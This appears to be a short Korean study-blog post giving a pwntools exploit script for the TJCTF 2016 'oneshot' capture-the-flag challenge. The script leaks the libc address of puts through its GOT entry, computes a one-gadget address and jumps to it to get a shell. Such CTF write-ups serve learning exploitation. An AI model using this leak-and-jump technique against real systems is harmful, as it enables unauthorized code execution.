CTF
TJCTF 2016 oneshot
공부하자~~
2019. 1. 24. 17:44
from pwn import *
r = process("./oneshot")
elf = ELF("./oneshot")
puts_got = elf.got['puts']
r.recv()
payload = str(puts_got)
r.sendline(payload)
r.recvuntil("Value: ")
libc_puts = r.recvuntil("\x0a").replace("\x0a", "")
libc_puts = int(libc_puts, 16)
oneshot = libc_puts - 0x2a47a
log.info("libc_puts = {}".format(hex(libc_puts)))
log.info("oneshot = {}".format(hex(oneshot)))
r.recvuntil("Jump location?")
r.sendline(str(oneshot))
r.interactive()